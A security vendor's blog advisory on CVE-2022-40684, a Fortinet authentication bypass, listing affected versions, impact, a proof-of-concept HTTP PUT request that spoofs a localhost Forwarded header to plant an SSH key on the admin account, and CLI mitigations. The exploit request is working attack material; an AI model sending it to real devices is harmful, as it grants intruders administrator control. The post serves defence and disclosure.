CVE-2022-40684: Fortinet Authentication Bypass Vulnerability Explained

Keep up to date with latest blog posts

The latest FortiOS / FortiProxy / FortiSwitchManager vulnerability has been reportedly exploited in the wild, which allows an attacker to bypass authentication and login as an administrator on the affected system.

Picus Labs has updated the Picus Threat Library with attacks that exploit the CVE-2022-40684 vulnerability affecting FortiOS, FortiProxy, and FortiSwitchManager products. We also updated the Picus Mitigation Library with prevention signatures of network security controls. 

Simulate Vulnerability Exploitation Attacks with 14-Day Free Trial of Picus Platform

Which FortiOS, FortiProxy and FortiSwitchManager Products are Affected by the Vulnerability?

FortiLab Guard Labs has confirmed that the vulnerability affects the following Fortinet FortiOS, FortiProxy, and FortiSwitchManager products. 

  • Affected FortiOS Products
    • 7.0.07.0.1, 7.0.2, 7.0.37.0.47.0.57.0.67.2.07.2.1

  • Affected FortiProxy Products
    • 7.0.0, 7.0.17.0.27.0.37.0.47.0.57.0.67.2.0
  • FortiSwitchManager Products
    • 7.0.0, 7.2.0

What is the Impact of CVE-2022-40684 Vulnerability?

The CVE-2022-40684 vulnerability allows adversaries to bypass authentication and login into the vulnerable systems as an administrator in FortiOS / FortiProxy / FortiSwitchManager products.

Having admin user rights, adversaries can 

  • add new users to the vulnerable system, 
  • reroute the network traffic by updating network configurations, 
  • listen to and capture sensitive data by running packet capturing programs,
  • download system configurations [1].

The CVSSv3 score of the vulnerability is 9.6 Critical.

CVE-2022-40684 Vulnerability Exploitation Explained

Below, you can see an example Proof of Concept (PoC) that abuses the authentication bypass vulnerability to set an SSH key for the specified user [3].

The Proof of Concept (PoC)

1. Adversaries can exploit this vulnerability with any HTTP method such as GET, POST, PUT, DELETE, etc. In the following example, the attacker sends an HTTP PUT request to the API. 

2. Through the “Forwarded header”, the attacker is able to set the client_ip to  “127.0.0.1”. This allows the attacker to perform an authentication bypass as the “trusted access” authentication check verifies that the client_ip is “127.0.0.1” and User-Agent is “Report Runner”, which are directly controlled by the attacker.

3. Being allowed to send a PUT request to the API, the attacker can modify the admin users’ SSH keys to enable themselves to login to the target system. 

Example

PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 Host: 10.0.40.67 User-Agent: Report Runner Content-Type: application/json Forwarded: for="[127.0.0.1]:8000″;by="[127.0.0.1]:9000″; Content-Length: 612 { "ssh-public-key1": "\"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIOC0lL4quBWMUAM9g/g9TSutzDupGQOnlYqfaNEIZqnSLJ3Mfln6rGSYol/WSm6/N7TNpuVFScRtmdUZ9O8oSamyaizqMG5hcRKRiI49F49judolcffBCTaVpQpxqt+tjcuGzZAoIqg6TyHg1BNoja/IjUQIVbNGyzl+DxmsX3mbmIwmffoyV8l4sEOynYqP3TC2Z8wJWv3WGudHMEDXBiyN3lrIDKlHzROWBkGQOcv3dCoYFTkzdKYPMtnTNdGOOF6wgWB3Y/fHyyWvbN23N2mxsgbRMdKTItJJNLGiJwYBHnC3lp2CQQlrYfsAnBQRu56gp7TPgheP+UYyGlYy4mcnsanGYCS4VozGfWwvhTSGEP5Uws/WxWNFq3Be7c/IWPx5AzvzT3iOq9R704xL1BxW9KAkPmjegav/jOEEh5YX7b+HcErMpTfo5DCi0CZilBUn9q/qM3v4HWKgJObaJnycE/PPyZML0xof29qvbXJDy2efYeCUCfxAIHUcJx58= dev@devs-MacBook-Pro.local\"" }

How to Mitigate CVE-2022-40684 Vulnerability?

In their PSIRT Advisories blog, the FortiGuard Labs have given some mitigation suggestions and recommended performing the following upgrades according to the vulnerable products [2].

For FortiOS:

  • Upgrade to version 7.2.2 or above
  • Upgrade to version 7.0.7 or above

If applying patch is not possible for some other reasons, apply the following mitigation suggestions.

  • Suggestion 1: Disable HTTP/HTTPS administrative interface
  • Suggestion 2: Limit IP addresses that can reach the administrative interface

config firewall address
edit "my_allowed_addresses"
set subnet <MY IP> <MY SUBNET>
end

  • Then create an Address Group:

config firewall addrgrp
edit "MGMT_IPs"
set member "my_allowed_addresses"
end

  • Create the Local in Policy to restrict access only to the predefined group on management interface (here: port1):

config firewall local-in-policy
edit 1
set intf port1
set srcaddr "MGMT_IPs"
set dstaddr "all"
set action accept
set service HTTPS HTTP
set schedule "always"
set status enable
next
edit 2
set intf "any"
set srcaddr "all"
set dstaddr "all"
set action deny
set service HTTPS HTTP
set schedule "always"
set status enable
end

  • If you are using non default ports, create appropriate service object for GUI administrative access:

config firewall service custom
edit GUI_HTTPS
set tcp-portrange <admin-sport>
next
edit GUI_HTTP
set tcp-portrange <admin-port>
end

Use these objects instead of "HTTPS HTTP "in the local-in policy 1 and 2 above.

For FortiProxy:

  • Upgrade to version 7.2.1 or above
  • Upgrade to version 7.0.7 or above

If applying patch is not possible for some other reasons, apply the following mitigation suggestions.

  • Suggestion 1: Disable HTTP/HTTPS administrative interface
  • Suggestion 2: For FortiProxy VM all versions or FortiProxy appliance 7.0.6:
  • Limit IP addresses that can reach the administrative interface (here: port1):

config system interface
edit port1
set dedicated-to management
set trust-ip-1 <MY IP> <MY SUBNET>
end

For FortiSwitchManager:

  • Upgrade to version 7.2.1 or above: Disable HTTP/HTTPS administrative interface

How does Picus Simulate FortiOS / FortiProxy / FortiSwitchManager the CVE-2022-40684 Authentication Bypass on Administrative Interface Vulnerability Exploit?

We also strongly suggest simulating FortiOS / FortiProxy / FortiSwitchManager   CVE-2022-40684 authentication bypass on administrative interface vulnerability exploitation attack to assess the effectiveness of your security controls using the Picus Complete Security Control Validation Platform. You can test your defenses against the CVE-2022-40684  vulnerability exploitation attacks and assess your security posture against the exploitation of hundreds of commonly exploited vulnerabilities within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threat for CVE-2022-40684 vulnerability: 

Threat ID

Threat Name

85726

FortiOS Web Attack Campaign (Web Application)

References

[1] J. Horseman, “FortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass IOCs (CVE-2022-40684),” Horizon3.ai, Oct. 11, 2022. [Online]. Available: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/. [Accessed: Oct. 18, 2022]

[2] “PSIRT Advisories,” FortiGuard. [Online]. Available: https://fortiguard.com/psirt/FG-IR-22-377. [Accessed: Oct. 18, 2022]

[3] “GitHub - horizon3ai/CVE-2022-40684: A proof of concept exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager,” GitHub. [Online]. Available: https://github.com/horizon3ai/CVE-2022-40684. [Accessed: Oct. 18, 2022]

Subscribe

Keep up to date with latest blog posts